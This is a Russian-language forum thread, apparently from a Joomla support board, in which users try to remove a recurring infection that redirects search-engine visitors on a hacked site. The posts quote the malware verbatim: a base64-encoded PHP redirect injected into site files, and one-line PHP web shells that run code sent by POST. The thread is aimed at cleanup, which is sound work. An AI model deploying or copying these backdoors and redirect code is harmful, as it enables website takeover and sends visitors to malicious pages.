art-m1987
Осваиваюсь на форуме
Репутация: +1/-1
 Offline
Сообщений: 154
|
 |
« : 26.01.2012, 13:50:55 » |
|
Уже почти месяц пытаемся бороться с проблемой. Сайт был заражен, как именно, наверное, уже неважно, факт в том, что на сайте засел вирус, который не поддается удалению. То есть его удаляют, но он сова размножается по всем файлам. На сайте работает админ, до него там работал я (конец лета), сейчас я просто помогаю разобраться с проблемой. Компы у всех чистые - вирусов нет ни у меня, ни у нее. Если пробовать переходить на сайт через Яндекс - редирект стоит на вирусную ссылку.
Кто-нибудь сталкивался с подобными проблемами?Что делать?
|
|
|
|
|
Записан
|
|
|
|
|
hedeag
|
|
« Ответ #1 : 26.01.2012, 14:10:08 » |
|
это вирус 'PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7Ym90dG9tOjBweDtsZWZ0Oi0xMDI0M3B4OyI+PGgyPjxhIGhyZWY9Imh0dHA6Ly93d3cudm96dm9kaW1kb20uY29tIiB0YXJnZXQ9Il9ibGFuayI+d3d3LnZvenZvZGltZG9tLmNvbTwvYT48L2gyPjwvZGl2Pg==';
вам надо вирусы удалить
ищите тотал командером по слову base64_decode
и хак слово decode($_POST
благодарность принимаю плюсами или деньгами на R184892837312
|
|
|
|
|
Записан
|
|
|
|
MarVel
Новичок
Репутация: +0/-0
Offline
Сообщений: 3
|
|
« Ответ #2 : 26.01.2012, 14:13:06 » |
|
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));
Вот так выглядит этот код, я его удаляю а он через некоторое время появляется вновь, разница лишь в количестве знаков "=" в конце кода.
|
|
|
|
|
Записан
|
|
|
|
|
hedeag
|
|
« Ответ #3 : 26.01.2012, 14:17:21 » |
|
ищите на хосте вирус файл PHP с строчкой decode($_POST
примерно такой <?php if(md5($_POST["password"])=="c2725594aaf2c0327abf7d144c3f991c"){eval(base64_decode($_POST["code"]));}?>
лежит скорее всего в images/post.php
он вскрывает систему завново
|
|
|
|
|
Записан
|
|
|
|
MarVel
Новичок
Репутация: +0/-0
Offline
Сообщений: 3
|
|
« Ответ #4 : 26.01.2012, 14:23:30 » |
|
<?php eval(base64_decode($_POST["php"])); ?> вот что в этом файле лежит, это оно? простите, в я в рнр не сильна  |
|
|
|
|
Записан
|
|
|
|
|
hedeag
|
|
« Ответ #5 : 26.01.2012, 14:28:23 » |
|
ну начнем с того что в папке images вообще не должно быть файла post.php если он там есть значит смело удаляем
не забываем
благодарность принимаю плюсами или деньгами на R184892837312
|
|
|
|
|
Записан
|
|
|
|
MarVel
Новичок
Репутация: +0/-0
Offline
Сообщений: 3
|
|
« Ответ #6 : 30.01.2012, 12:22:19 » |
|
Я удалила из папки images все файлы с расширением php, полностью удалила вредоносные записи из всех документов, но редирект все равно идет время от времени само по себе меню то пропадает то появляется, при этом если заходить через админку то пишет что нет файлов.. а через буквально пару часов все становится на место и меню уже присутствует и доступно.....
|
|
|
|
|
Записан
|
|
|
|
|
wishlight
|
|
« Ответ #7 : 30.01.2012, 14:12:44 » |
|
|
|
|
|
|
Записан
|
|
|
|
|
hedeag
|
|
« Ответ #8 : 30.01.2012, 14:15:37 » |
|
Я удалила из папки images все файлы с расширением php, полностью удалила вредоносные записи из всех документов, но редирект все равно идет время от времени само по себе меню то пропадает то появляется, при этом если заходить через админку то пишет что нет файлов.. а через буквально пару часов все становится на место и меню уже присутствует и доступно..... как вариант, удалили не все, или же удалили наоборот что то нужное для работы сайта у меня был случай когда заразили 9 000 файлов, вы из скольких удалили? |
|
|
|
|
Записан
|
|
|
|
rembot
Осваиваюсь на форуме
Репутация: +1/-0
Offline
Пол: 
Сообщений: 117
Молодец, но не орел...
|
|
« Ответ #9 : 30.01.2012, 14:23:41 » |
|
http://joomlaforum.ru/index.php/topic,198048.0.html - С помощью скрипта из этой темы можно просканить систему и узнать где вы не почистили. Возможно вредоносный код остался в каком то из файлов модулей.
|
|
|
|
|
Записан
|
|
|
|
art-m1987
Осваиваюсь на форуме
Репутация: +1/-1
Offline
Сообщений: 154
|
|
« Ответ #10 : 03.02.2012, 13:25:34 » |
|
ничего не помогает...
|
|
|
|
|
Записан
|
|
|
|
|
hedeag
|
|
« Ответ #11 : 03.02.2012, 13:29:45 » |
|
ну если ничего не помогает обращайтесь к спецам за деньги, есть коммерческая ветка
|
|
|
|
|
Записан
|
|
|
|
|
Poznakomlus
|
|
« Ответ #12 : 03.02.2012, 13:31:10 » |
|
ничего не помогает...
из своего опыта. порой легче разархивировать Joomla и ее модули компоненты и т. д и подключить к старой базе. |
|
|
|
|
Записан
|
|
|
|
art-m1987
Осваиваюсь на форуме
Репутация: +1/-1
Offline
Сообщений: 154
|
|
« Ответ #13 : 03.02.2012, 13:46:12 » |
|
ну если ничего не помогает обращайтесь к спецам за деньги, есть коммерческая ветка
Плиз, ссылочку дайте. |
|
|
|
|
Записан
|
|
|
|
|
|
|
